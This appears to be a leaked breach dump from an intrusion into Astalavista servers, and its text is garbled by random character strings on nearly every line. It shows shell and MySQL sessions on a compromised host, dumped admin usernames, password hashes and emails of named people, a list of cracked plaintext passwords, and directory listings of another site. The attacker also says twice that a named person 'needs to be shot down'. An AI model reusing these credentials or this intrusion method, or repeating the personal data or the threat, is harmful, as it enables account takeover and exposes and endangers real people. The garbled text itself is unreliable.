) u' o7 L! O0 l6 f( E/ S <description>All availably Exploits.</description>6 ]* y+ O3 _$ ^' P4 C
<language>en-us</language>+ J( o$ E2 Z6 ^. w6 U2 p3 U
<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>3 Q8 Q: g. [7 a
<docs>http://blogs.law.harvard.edu/tech/rss</docs>
$ F" P4 o3 J# |7 J% J2 | <generator>Astalavista.com</generator>
$ @/ Z7 ~) }' K6 O <webMaster>info@astalavista.com</webMaster>’ . $items . ‘$ @7 v$ }4 d) Z( k5 c1 j( M
</channel>1 r; p9 S5 g& e( u1 V/ C1 M4 u
</rss>’;
8 e$ x. c& k* A4 B8 V% {8 n ~( V4 {6 g9 R8 Y c) j0 N
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
% J& y- O- T$ W, ^2 ]5 O7 Q unlink (FULLPATH . ‘/feed/exploits.xml’);2 B" {% x- U# q0 b" H8 B6 v
}. h I& S' D9 w2 ?
' o1 D6 }0 E8 |" z* P
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
$ f* r. A. ?# S* \[snip]9 V# V& W U3 D2 h* ]% ]2 _( R6 L
7 g, \9 g+ S. K5 r9 C b# B
sh-3.2$ cat exploits.sh
) }5 X8 d* q, {, P& q#!/bin/sh6 V3 D1 `4 c, x) L1 |6 Q
2 l& f; \+ ~: E' P. E" E###########################################################
* x! O1 G7 P% ~# c8 ?# #7 E, j4 Q% Z$ \. @* @, s. N
# Title: milw0rm exploits adder #
5 f( O+ x4 c# Y# Description: Add all milw0rm exploits to the #
$ ?( l. `9 ^. S8 m% g$ Y1 B% n' l# Astalavista.com database #
5 D6 T9 g# H1 F( K6 C5 o. _# #
. i7 N6 S- L, R# Company: Astalavista Group #4 n/ t9 {3 e/ M M9 f; ~, g
# Author: Paulo M. Santos #+ p4 C. I9 N+ U
# E-Mail: 链接标记paulo.santos@astalavista.ch #
) z# K+ u& s9 z$ f0 R# #
. S. H8 @. y# b5 d% ]9 j0 ^* M: g) l% E###########################################################
0 L9 p! ~5 P4 M( H
1 Y, {2 q9 f5 A8 [# path0 J; v4 {& l% ~% K
this_path=/home/com/public_html/modifications/cronjobs6 W9 n6 d" ~+ U: o
2 |+ M! \* [# V7 D, b2 S8 w& N; C
# change directory
2 a1 t9 ^$ I$ m. n dcd $this_path
* q: C) X; r2 o6 U0 f# }6 zcd tmp/
# v$ R$ o4 Z- @$ P
7 Y0 c$ R- q1 m5 u# delete files
1 r5 X8 x/ ?2 D* F7 mrm -rf milw0rm.tar.* &: I: u. k; K; P" e/ n
rm -rf milw0rm/ &
' d/ r( g7 Z9 Y! N/ ?
7 F) E+ o) m2 g& N4 A; b# wget milw0rm paket
' k3 P0 Q- I. B3 p! d( \* I5 mwget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]% F2 q" z6 D1 B, n5 L
; o& y c/ Y o, a* X
# extract milw0rm paket: K- i9 O( c) A' k4 E
tar -xvf milw0rm.tar.bz20 S# Q5 s2 s5 p. X) y. Y9 g
# g' {) i& U4 P
# change owner
/ ^8 M9 D+ y; Cchown -R com .
3 M7 f( N2 _- M9 {8 q. F9 x9 b4 wchgrp -R com .
. b* y5 e) Q) W- u$ Z2 q% L k+ O) s( O
# execute php script
4 m7 r1 ?' `6 S9 g0 bcd $this_path* |" K" [5 H. e
php -q exploits.php3 I/ H2 J h9 C
) @& p' e, A: ~7 |/ V
# delete files
' a* v+ S e9 V) S$ P2 F' K( nrm -rf tmp/milw0rm.tar.*
) B# c& H0 p6 L% b5 C4 l Orm -rf tmp/milw0rm/
8 u8 X3 }. }9 n, R$ ~% y2 B0 J( p" U e0 C8 O9 Q( c o
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”1 J, ]; b* \+ \; N i( K
Paulo M. Santos needs to be shot down.
. V3 \/ Q6 Y6 a e% |8 N7 i9 ~
/ T* i7 T! c7 Ymysql -u contrexxuser2 -p* o) P9 n2 n% x$ t. i/ A6 }
Enter password:
0 C' W9 [7 J- j4 hWelcome to the MySQL monitor. Commands end with ; or \g.& m) J# O2 [4 x! C
Your MySQL connection id is 261694/ G4 e" t& q* {* N- e3 c$ T% c
Server version: 5.0.45-community-log MySQL Community Edition (GPL)7 j( C4 }7 d, L% p
" d7 X/ A0 q- X; p
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.9 N4 k( P% ?7 E% l6 y2 r/ t% T
. d3 J' y. U; @: f
mysql> show databases;& Y% m: f, V( A- ]
+——————–+
5 b3 ^# I$ B, }) y| Database |
1 t" H6 N# k2 m3 O2 A L+——————–+
) j# h, q+ |( a3 M ^' {1 w| information_schema |
2 A. h) @5 P7 P| com_contrexx2 |0 t# _2 u" s( v$ y. M2 y
| com_contrexx2_live |) P. h/ l0 x5 l; L
| test |) F) v. t {4 ]+ y$ }
+——————–+ q! P Y. T, r
4 rows in set (0.00 sec)( S6 O! g# b" H7 b j$ J+ \
! ^& r) q% n# r2 `mysql> use com_contrexx2_live' _8 j, g; D' \9 ]( Y
Database changed
: V' j5 W7 c( L& R; vmysql> show tables;
* h7 {/ v( z4 X2 H2 x+ o+————————————————–+5 z+ ~8 h- a! ~$ C3 S Y
| Tables_in_com_contrexx2_live |0 _6 a+ P0 i# `
+————————————————–+
& w8 m3 r# |% N) u$ X* H* J1 J| cc_banner_counter |; G1 x' j0 @( t9 y8 U
| cc_search_counter |
8 N6 J. {! o" [' r. W5 t5 c+ K+ P) r| contrexx_access_group_dynamic_ids |, w Q/ Z* x: g* i
| contrexx_access_group_static_ids |
. o8 q c" d6 m: s1 K| contrexx_access_rel_user_group |
, T$ @1 {& A3 D| contrexx_access_settings |( T# u! H' E3 a* h
| contrexx_access_user_attribute |1 T/ k& Y, \ g" p- p2 T
| contrexx_access_user_attribute_name |2 O1 Y0 O2 _$ B* A. a$ O% m
| contrexx_access_user_attribute_value |
) j4 S6 f Y2 }/ L9 K: T| contrexx_access_user_core_attribute |
6 R3 c/ v+ a3 u" L| contrexx_access_user_groups | ]+ K' n# n1 `" o: U4 |3 g9 S
| contrexx_access_user_mail |3 t1 T$ I5 R# G# N& t' a
| contrexx_access_user_profile |
# @6 J( u" }! || contrexx_access_user_title |
1 m* n* ?6 B7 t4 p+ l V" U( M| contrexx_access_user_validity |
8 d% G6 X; O) Q: D, U* e| contrexx_access_users |
: T- t& [0 t# y& } l. \; i7 S7 z4 h| contrexx_backend_areas |# N4 e: j G, Y4 z: k
| contrexx_backups |
|4 }- B; w) u: q y9 j| contrexx_content |' J+ h" J" ]+ I; u
| contrexx_content_history |
* R5 l& K/ u& i3 h% X8 E| contrexx_content_logfile |
6 n( m( p* g. `" ]4 P, K| contrexx_content_navigation |
; M* \' k! A. p| contrexx_content_navigation_history |( p1 A* a& w. ^
| contrexx_ids |* N, ^: f" \0 h" {
| contrexx_languages |
9 {' A3 c0 G# p- u# J. z| contrexx_lib_country |
! v4 o) k$ r y" k. h$ N7 q| contrexx_log |: c1 s: V" i9 K w2 G9 }
| contrexx_module_alias_source |
" B0 p, E+ }, @) [% N| contrexx_module_alias_target |0 F. }+ j) M8 S( U% L
| contrexx_module_block_blocks |7 L# I: v% l% ~3 \( [7 J/ ]
| contrexx_module_block_rel_lang |8 M A4 ?) m# j M; I& z, g" x' K
| contrexx_module_block_rel_pages |" t' j& E% m! C* f% r' V$ C- r" d0 n
| contrexx_module_block_settings |1 K6 Y& v4 ^3 y
| contrexx_module_blog_categories |
. r) P6 r& s9 o% x, O- Z- p% R+ w| contrexx_module_blog_comments |" _4 M. [$ z# F3 d9 k! V/ _, e
| contrexx_module_blog_message_to_category |& P5 z* F+ v, N4 }/ r9 h( t
| contrexx_module_blog_messages |
# w b2 o! W- V) f* R* p| contrexx_module_blog_messages_lang |
- h3 ]* w; E" K9 G+ T a2 y| contrexx_module_blog_networks |3 V$ U' K0 ?. b3 |: a
| contrexx_module_blog_networks_lang |. ^$ l# ^; {5 X4 L5 @! q
| contrexx_module_blog_settings |5 J. v; h% N- t% _$ W- M
| contrexx_module_blog_votes |) `/ ^( Q) `; X" L9 g
| contrexx_module_calendar |# W9 _) }% R; ]2 [- T% H
| contrexx_module_calendar_access |% t. s) V3 E- z! p
| contrexx_module_calendar_categories |" p# L6 \) [7 R+ T: ~- H* ^
| contrexx_module_calendar_form_data |: ]! c9 S y2 T7 L' F! k/ Y
| contrexx_module_calendar_form_fields |
. d0 f, G& g; ?& `5 v' k* T6 C| contrexx_module_calendar_registrations |6 k) i. L& Z# Y k+ W' k
| contrexx_module_calendar_settings |/ ` [ m( G2 C' c3 W
| contrexx_module_calendar_style |
4 r5 R- i# u4 D| contrexx_module_contact_form |6 Q, c" j) h. ^7 I3 y, F# _5 d
| contrexx_module_contact_form_data |8 b2 J6 K1 E' ^
| contrexx_module_contact_form_field |. V, W2 I0 v' s) `' c
| contrexx_module_contact_settings |
; z. K" \8 z, j5 K0 v" r2 g, s| contrexx_module_data_categories |' D* {' Q& o+ k% D' E7 \
| contrexx_module_data_message_to_category |
' ^8 e$ B# |5 T% G, k& y! ~| contrexx_module_data_messages |
# ]! {/ v7 u7 Q, n9 I) _9 ~7 V| contrexx_module_data_messages_lang |
1 p, l. Z# u" Z| contrexx_module_data_placeholders |
# [5 C ~3 \& X, A( N3 K" w| contrexx_module_data_settings |
* C; e' H0 |* F& w/ B' ?3 [| contrexx_module_directory_access |
. Y, Z& a. K1 N9 T7 l& w| contrexx_module_directory_categories |2 C7 y/ N: z" ?2 {5 n& p' w
| contrexx_module_directory_dir |
- M- {! r* d& ?& }# l| contrexx_module_directory_inputfields |
! j8 N B' e% q3 X2 p, z| contrexx_module_directory_levels |6 V1 U n0 x* |, J2 ~" X6 \
| contrexx_module_directory_mail |! H6 g0 Z2 B/ ~/ |3 q
| contrexx_module_directory_rel_dir_cat |& q6 N2 H* B* x
| contrexx_module_directory_rel_dir_level |0 N9 i! b: e% |& g' A
| contrexx_module_directory_settings |
7 x. T+ H% j4 y( h3 F8 J| contrexx_module_directory_settings_google |) A' P* j7 ] b$ i4 M: z- E
| contrexx_module_directory_vote |
% ?( D% a( s& Q7 r3 V- C| contrexx_module_docsys |
' v) o+ E/ U" i| contrexx_module_docsys_categories |+ \+ t- i: E) d7 W, x) W; R4 \1 L
| contrexx_module_egov_configuration |, L" T R) Z/ P& w$ H
| contrexx_module_egov_orders |
0 i% W Z1 {6 o8 d| contrexx_module_egov_product_calendar |
, t: H4 R8 r4 {4 X| contrexx_module_egov_product_fields |) t" z! F4 b C3 M# e( w) I$ A0 e
| contrexx_module_egov_products |1 l+ a q% A* u& ?. j5 I8 G
| contrexx_module_egov_settings |
, y* d3 m" a5 n. r& \| contrexx_module_exploits |
3 D# O' T) T/ J) X5 K% Z; F| contrexx_module_exploits_categories |/ O p N5 {0 B; S- D+ @, K
| contrexx_module_feed_category |
! j' z5 r5 W# Z! z# C| contrexx_module_feed_news |& B* {, V$ t$ ~8 a, q% ]
| contrexx_module_feed_newsml_association |
5 a" O) i2 j' }$ f8 X) @| contrexx_module_feed_newsml_categories |1 F P- n& Y1 [
| contrexx_module_feed_newsml_documents |
! }$ p) U. q( y" F7 v| contrexx_module_feed_newsml_providers |
( C: w. i. e" n/ |# }- s| contrexx_module_forum_access |
/ w( ?% {0 f4 z8 l( G6 d5 y7 S! X| contrexx_module_forum_categories |! |# F! ]2 c, O# J
| contrexx_module_forum_categories_lang |
9 u7 H7 W% ^4 }| contrexx_module_forum_notification |
; o' u! Y- e+ g, V2 ?| contrexx_module_forum_postings |
& O* ~' a! p( ?| contrexx_module_forum_rating |
L5 u7 K# v3 ~0 \1 Z& ]: E/ x/ g3 C( c| contrexx_module_forum_settings |$ \! w5 B. v3 E& T
| contrexx_module_forum_statistics |& q1 j$ m1 `& O$ j, J0 S! |
| contrexx_module_gallery_categories |: p, {2 G! B& b+ A1 Z9 E( s
| contrexx_module_gallery_comments |
5 S/ O2 f. [; i# I4 ^# W| contrexx_module_gallery_language |% t5 H; g6 `7 U
| contrexx_module_gallery_language_pics |
7 l- t/ t2 J |0 k) `5 U# L7 ^| contrexx_module_gallery_pictures |
$ i' C, f# [/ \: J| contrexx_module_gallery_settings |
; z& k3 ?( a# z' ` R4 F| contrexx_module_gallery_votes |
. D$ Z# y! K8 `) |# q| contrexx_module_guestbook |
( @3 S0 y6 I! [) A3 M& Y" |; P1 W| contrexx_module_guestbook_settings |+ a& _' {8 d# o! T4 i5 t
| contrexx_module_livecam |
; B1 k4 l7 K1 r4 || contrexx_module_livecam_settings |: E6 G4 [. o" O+ N7 a
| contrexx_module_market |* e o' N# H/ l9 L; F
| contrexx_module_market_access |
* P& C0 H/ R6 D/ e% m" E, D| contrexx_module_market_categories |; H' [# _# M& @+ Z5 c2 L
| contrexx_module_market_mail |
3 I. k; q; [) S; C, q| contrexx_module_market_paypal |
' l" b! p9 a+ g: ~5 V8 R3 ~6 V| contrexx_module_market_settings |
' y6 ?/ `$ A% D8 F' \1 W| contrexx_module_market_spez_fields |
6 S. X7 T5 [0 g3 A+ Y' v; u" G| contrexx_module_mediadir_access |; N: A2 @( s4 @0 M# j" p
| contrexx_module_mediadir_categories |, Q# E' @3 c4 t w0 b
| contrexx_module_mediadir_comments |6 r; Y, b; @; S1 m; x0 H
| contrexx_module_mediadir_dir |
" D$ {3 l' C" d$ V| contrexx_module_mediadir_inputfields |
1 ?1 ?2 S4 s. t+ Q1 M5 \$ s/ o| contrexx_module_mediadir_levels |
# {0 v, v3 b- s4 m- Q3 || contrexx_module_mediadir_mail |' T7 w" A; t9 J: K/ X; B
| contrexx_module_mediadir_rel_dir_cat |
8 U( p# b' f$ O+ ?| contrexx_module_mediadir_rel_dir_level |
3 v. p' V- j9 @, {6 K| contrexx_module_mediadir_reports |
5 U0 m" [5 N3 U| contrexx_module_mediadir_settings |, I! W% |; L$ p# B! ?& @
| contrexx_module_mediadir_settings_google |
; d& K/ G7 d: ^9 ~+ x4 f| contrexx_module_mediadir_vote |% u$ W! M; |7 B! v
| contrexx_module_memberdir_directories |
1 b9 `' Q& w/ ~# W* H/ B" g| contrexx_module_memberdir_name |
* A6 H; S, P4 P( L/ G| contrexx_module_memberdir_settings |
4 ~* o) k/ G% Y- I) X| contrexx_module_memberdir_values |
* W% u R' m! D+ w! V. X; n| contrexx_module_nettools_allowed_groups |% U/ l# c6 i, o) T
| contrexx_module_nettools_settings |
# T# _7 ^ f( s$ y5 I3 {| contrexx_module_news |
! T! Y6 W9 L' M! \| contrexx_module_news_access |
2 k* X: z5 q, w( [, q- l4 Q' _# J| contrexx_module_news_categories |$ y# q9 c! \- B; P! e1 G; ]1 V
| contrexx_module_news_settings |5 @2 x5 ~+ \, N% j. [
| contrexx_module_news_teaser_frame |( \+ q; Z3 H% x5 }
| contrexx_module_news_teaser_frame_templates |
/ \3 o; \6 o% O3 I8 _' j: w| contrexx_module_news_ticker |9 U) T$ G! z; Y& U+ f3 l" z7 X0 r" m
| contrexx_module_newsletter |6 v, i; i" W8 M
| contrexx_module_newsletter_attachment |
! X# N3 a( i w4 t& s4 `" G" g| contrexx_module_newsletter_category |
4 G8 F6 F2 r$ p4 E| contrexx_module_newsletter_confirm_mail |
0 }7 u# h* u. F1 v| contrexx_module_newsletter_rel_cat_news |
b" o+ D: I3 u* ]3 n: t| contrexx_module_newsletter_rel_user_cat |
6 {0 |5 R* G9 S7 w) U' W+ s* Q| contrexx_module_newsletter_settings |
0 E1 ^0 n; N, t( m9 @2 v" j# V| contrexx_module_newsletter_template |
& L1 A1 s! t" J0 j9 W0 M| contrexx_module_newsletter_tmp_sending |$ ~0 N5 a8 { Z
| contrexx_module_newsletter_user |3 P2 e) o2 A' u# k% O2 U, T2 r
| contrexx_module_newsletter_user_title |2 H V( n, [# d& r$ t$ b
| contrexx_module_onlinetools_defaultports |
4 U$ E& [- {" w$ z) Z) X| contrexx_module_onlinetools_defaultports_back |
: m# T7 N) N) a- z! [2 a* Z| contrexx_module_onlinetools_geolitecity_blocks |; i2 k& L0 B. t/ F5 x$ y3 O
| contrexx_module_onlinetools_geolitecity_country |+ b& G3 J7 p( ]' q0 t/ v
| contrexx_module_onlinetools_geolitecity_location | H v8 `8 s; X" Z
| contrexx_module_podcast_category |5 q9 Q9 m3 j; J5 x
| contrexx_module_podcast_medium |; O6 R- s* \9 e7 b- `0 g
| contrexx_module_podcast_rel_category_lang |* J5 @, T+ I J* \9 t: l& R% F
| contrexx_module_podcast_rel_medium_category |/ |/ ?* Z+ g7 z6 M E% t) S
| contrexx_module_podcast_settings |0 K7 m q% S+ N8 ~- z! J
| contrexx_module_podcast_template |5 x2 e* n% z& l& P- f
| contrexx_module_proxydb |4 Z# e5 }6 `" x( |1 _6 s
| contrexx_module_recommend |( K8 ^9 E* A4 E2 W
| contrexx_module_repository |" g* R8 q8 f8 x8 P: q8 w6 F
| contrexx_module_securitynews_cats |
3 Z2 J" j+ o. }" H- ~5 G8 Y; E' `! n2 y| contrexx_module_securitynews_feeds |1 e% V5 s4 t; y
| contrexx_module_securitynews_news |
3 W9 k m/ n; d7 o- P0 A. ~1 a| contrexx_module_shop_categories |
) L9 J2 k6 k2 T| contrexx_module_shop_config |$ ~2 a1 x/ w" n' _' O
| contrexx_module_shop_countries |
/ H0 X! g. b. q1 @: A2 F| contrexx_module_shop_currencies |
7 `- ^& [4 }3 ~6 F6 X| contrexx_module_shop_customers |: W1 w) C7 q* J' L; g! P
| contrexx_module_shop_importimg |1 Y# i) M+ a% S
| contrexx_module_shop_lsv |
5 V4 N8 ]& c: _+ s| contrexx_module_shop_mail |
+ L- ]9 x8 t- A$ C* r| contrexx_module_shop_mail_content |+ T$ w% a2 V8 s
| contrexx_module_shop_manufacturer |6 q5 ^: B2 e$ W) f
| contrexx_module_shop_order_items |
" ~% ^' G) f& n! e: u| contrexx_module_shop_order_items_attributes |
% |; s$ p. d" @: ^$ F) v V5 i5 O| contrexx_module_shop_orders |- a9 f( W, I# j# {. i! x
| contrexx_module_shop_payment |
' o, v3 r: u. e5 n/ V| contrexx_module_shop_payment_processors |
# ^% x8 q# A, `, ~5 M) T| contrexx_module_shop_pricelists |9 n0 l/ |, b( r6 x
| contrexx_module_shop_products |' s0 T3 i" J( h# K. D' U
| contrexx_module_shop_products_attributes |
$ a# l# O; P9 k3 v; P| contrexx_module_shop_products_attributes_name |: _' K7 e9 l1 N T" z# t- |$ ~
| contrexx_module_shop_products_attributes_value |9 N) z" X- z; {3 ~
| contrexx_module_shop_products_downloads |/ L9 Z. L% e3 r9 l" P9 }
| contrexx_module_shop_rel_countries |
3 e% V# o9 U: n1 `| contrexx_module_shop_rel_payment |
) W8 p9 H# K# {- x! ?| contrexx_module_shop_rel_shipment |
( {8 K- O4 O3 r+ R8 w# h| contrexx_module_shop_shipment_cost |
3 B4 q# h# W$ x| contrexx_module_shop_shipper |
h# N1 Z( ?$ h, A8 d| contrexx_module_shop_vat |7 |# O) d: g! s+ ^
| contrexx_module_shop_zones |3 ?# k+ K2 c; g2 M4 N
| contrexx_module_u2u_address_list |
, p6 G" v3 }) H1 d) n0 Q% \# ^3 B| contrexx_module_u2u_message_log |
+ W' j$ q+ |* G* d0 ]2 C6 Y7 W| contrexx_module_u2u_sent_messages |2 C. u6 t1 G& ?! m$ ^
| contrexx_module_u2u_settings |
% g+ D/ X6 c% F, s' {| contrexx_module_u2u_user_log |
4 P4 c$ C3 O7 I7 h1 a| contrexx_modules |
4 G9 o9 q. K( L3 {| contrexx_sessions |3 T3 ]8 `" B' J0 j! e
| contrexx_settings |2 [3 J& X" ]- J: v
| contrexx_settings_smtp |1 @- B! l7 a/ i4 p# P4 g2 c
| contrexx_skins |
! h/ p5 s0 L9 W5 p/ f+ }+ l5 || contrexx_stats_browser |
9 r7 z7 q3 Y# v! x, Z" H# q0 w| contrexx_stats_colourdepth |
9 k5 j7 @, t. h7 o7 D| contrexx_stats_config |% t w5 h! f+ e6 @; D2 M: s
| contrexx_stats_country |
, U1 H* @ G% g& V% K& x% O" z| contrexx_stats_hostname |
' X) b3 m% H; G/ }$ D! I| contrexx_stats_javascript |
. ~2 |, S! I$ ~) c| contrexx_stats_operatingsystem |
% q% {1 ]( y+ L- V+ h| contrexx_stats_referer |
3 d6 c/ H8 J$ J3 @, b) W* j| contrexx_stats_requests |5 h( M% A7 l, @+ v
| contrexx_stats_requests_summary |
9 w! o4 B* y# I9 [6 e7 Z| contrexx_stats_screenresolution |: l# c% c7 A1 z1 [/ | p9 v4 U
| contrexx_stats_search |% o2 u7 l$ i6 k* Z/ S
| contrexx_stats_spiders |
) T( ^$ n! K6 \4 B5 {! |7 T3 ?| contrexx_stats_spiders_summary |
6 Y& Y) _0 E2 ?| contrexx_stats_visitors |
8 f% c2 X; \8 T4 b. g% A| contrexx_stats_visitors_summary |
0 o+ S7 U9 v# n| contrexx_voting_additionaldata |
6 }% b V) M+ K9 ?) F| contrexx_voting_email |
5 g) ?7 P9 V# y0 f% E: o| contrexx_voting_rel_email_system |
% G, W. ?) h. h7 V2 n4 F7 |7 b9 {| contrexx_voting_results |5 ^; s. q/ [1 u. B+ R
| contrexx_voting_system |
9 U5 d. L- y9 S! }| foo |4 v0 y; F" C+ V
+————————————————–+
2 u$ @' X9 i* z5 D- d- ~227 rows in set (0.01 sec)" I/ c9 V$ T; a9 D7 x6 y# R
8 d, P2 J& E6 X0 p3 N2 imysql> select count(*) as skids from contrexx_access_users;8 {* y) v( p6 m M
+——-+! }+ e9 H4 L% P, Z
| skids |
2 P5 A" i m z9 H6 o4 b+——-+( s% ~; C2 k0 U
| 53699 |7 f/ q3 \3 p w, S
+——-+
! E/ Z$ M( D* Z/ N2 D1 [1 row in set (0.00 sec)
. h7 |0 u4 F8 @" c W/ o0 P" @
, m z( D7 e- V2 Amysql> describe contrexx_access_users;' V) u M) J/ h4 y
+——————+——————————————+——+—–+————–+—————-+
$ i, z) [0 s) T8 {2 _| Field | Type | Null | Key | Default | Extra |
]8 j. F% s. a8 w0 [9 `8 f+——————+——————————————+——+—–+————–+—————-+9 T# S$ x; j% W. x& T& X
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |$ G' N8 m; ^: R) ^
| is_admin | tinyint(1) unsigned | NO | | 0 | |" b. U6 ]6 m+ v" p
| username | varchar(40) | YES | MUL | NULL | |
4 ? M m1 o( g& {| password | varchar(32) | YES | | NULL | |
0 j( h2 A" w" e# {! |8 {1 z4 c| regdate | int(14) unsigned | NO | | 0 | |
( J; r" g+ N* E( t$ L| expiration | int(14) unsigned | NO | | 0 | |& `; \8 N- E% y# I
| validity | int(10) unsigned | NO | | 0 | |' {! L# N9 x# k0 V8 A7 Z E
| last_auth | int(14) unsigned | NO | | 0 | |
$ p5 I, Q9 B1 P8 P5 K2 s8 c" X| last_activity | int(14) unsigned | NO | | 0 | |
. c7 A7 r; k/ m2 k) G| email | varchar(255) | YES | | NULL | |
" z1 ]! O8 s. \# y: J) V) ?4 U| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |- q4 y. a8 R5 p- `
| frontend_lang_id | int(2) unsigned | NO | | 0 | |
: b0 r* k$ H& A3 N2 {- n| backend_lang_id | int(2) unsigned | NO | | 0 | |5 D9 D. f+ `' U
| active | tinyint(1) | NO | | 0 | |8 W2 F( o( X0 B2 a
| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
# \3 O( M1 W0 T2 w9 o' _2 b| restore_key | varchar(32) | NO | | | |
2 ]" w9 ]; z0 I. r| restore_key_time | int(14) unsigned | NO | | 0 | |
& H3 U9 I! d& J9 c# t| u2u_active | enum(’0′,’1′) | NO | | 1 | |) Y6 o0 s* p$ R; [# Y" Y; M
+——————+——————————————+——+—–+————–+—————-+! c8 M0 M1 a0 H1 P$ T* g' r6 V
18 rows in set (0.00 sec) ^8 u* U/ t* J6 W% a
+ j; f9 X3 b" D
mysql> select username,password,email from contrexx_access_users where is_admin = 1;
2 x: } l0 s; ] u1 V+————+———————————-+—————————–+; N! o" _3 N4 F. F, R# E& ^( V6 v
| username | password | email |, ~0 Q/ k* ]' S; |* S6 R
+————+———————————-+—————————–+
/ L4 }8 F& ^: y| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |
! n, o# C8 \: v9 X| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |
: a+ k" I2 v$ k$ C0 W1 d| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |/ l j! g: D: o
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |( n: o1 c; s9 r. I3 E* y! E
+————+———————————-+—————————–+
0 U; b5 k' Z0 [2 m2 T* v4 rows in set (0.04 sec)
0 i( Q H6 Z8 I+ ]+ u5 O# g4 j# T B0 i9 Y* }
mysql> exit;) B: N: b2 {0 O
Bye; e& n% m0 r* {" h7 q' R
, q+ i9 p2 j$ A/ c0 @- f$ T% k
[~] There you go, your “team of security and IT professionals” is a joke.
) i$ j% i9 i& ^: B l* w0 p3 b7 ]/ S6 t5 A4 {7 g+ Q4 E' Y
+——————————+' x0 T$ |* C' {4 {% @9 c; S
system:f82BN3+_* ?/ R& ^/ L5 v/ l" ]) q9 w
Be1er0ph0r:belerophor4astacom* e. [' g% o/ e( {: t
prozac:asta4cms!
5 w8 w& \* U6 z2 Y4 x0 e+ ecommander:mpbdaagf6m
1 V% _8 U- b' S; t; `2 r8 Fsykadul:ak29eral
7 O# y Y2 v" ]- @+——————————+
$ C9 z2 s5 r& N8 E3 w
7 f" r5 s, X, D9 i/ }[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
% r$ T. a2 U0 U* L…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
" q" z9 R3 |7 @. `2 Z
4 ^7 c0 j- ~7 K: p* N[~] Lets move to astalavista.net now,
7 n- u: n9 }! j# r- S/ n/ \9 ~
2 J" `7 b6 P7 D2 UFrom <链接标记[url]https://www.astalavista.net/[/url]>:
, A1 Q+ s. \: y; l0 [" U/ T>> Everyone knows that the best defense is a good offense.+ X, A6 ?" y5 R l
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.! \; b# R5 R+ Q! S6 R5 g
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
+ z% D; m; Q! S; Y# o4 S' D>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
) Y' k. W+ d; E: Z) t% T" q/ T
>> Go ahead, try and hack our server . in a completely legal way!
* V- \3 ~% d1 j9 e" k, E>> Learn by doing: We offer our members tricky tasks and challenges on an
9 r6 c( V7 \1 u% e3 I>> ongoing basis so you can test your knowledge and abilities. You can also" l$ E d( H4 m& f- H) {
>> demonstrate what you.ve mastered by taking part in regular hacker contests( b. ~2 u0 Y: N8 S" Q
>> and war games
4 H: z4 T, V' _8 K# V: H+ I+ I8 ?% S) @
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
- ?. j* e( t7 ?/ r% G- A+ z9 b
' L6 X' n Z; n( B[-] Tricky task: Find home dir of astalavista.net: g7 F) V; O* D3 H* O8 ^
% e! e' I e9 ysh-3.2$ ls -la ~astanet1 n2 E6 t* s0 K# x% e1 o
total 48
' ^4 W9 k1 c9 P. [% Qdrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .
* S8 F3 n1 z8 C( K. _+ m4 T$ k3 Adrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..! }5 `, V: |/ T/ @- [" l* T
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth5 x) X5 O/ z# W# i: P
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
- A# T5 t1 f) x9 X-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
0 A- w! Z6 l2 u' j5 S-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile4 i+ i% ^" l$ u4 K& o
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc8 g2 B! A: [) c+ y
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains$ t, V1 \* F0 L1 U: v# c( {
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
9 ^" u) B" s( g9 s' o# \ z: o" Ndrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail3 B; @: X1 o5 _0 [9 ?% d% _7 P* y' }
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
, `( g6 a2 D! ~9 z# O7 L-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow3 @( G! X. j M# J: v
! N9 o$ v" `( ]- W
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/' B! Q9 e( w/ @- i$ i7 h
sh-3.2$ ls -la4 ?1 U3 z# `0 Y& r; q* X
total 200; G k) h; h& z8 Q* S: x+ d
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
1 [. e: b7 i, K G# P* ^& a; K$ sdrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..5 Q/ r+ t. r' _1 B3 w- Y8 b5 f
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _0070 w! c# w V. [ R' y
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql O) P0 @8 k* J+ ]! p1 T
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com: X9 E9 [9 c" n0 y# v
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
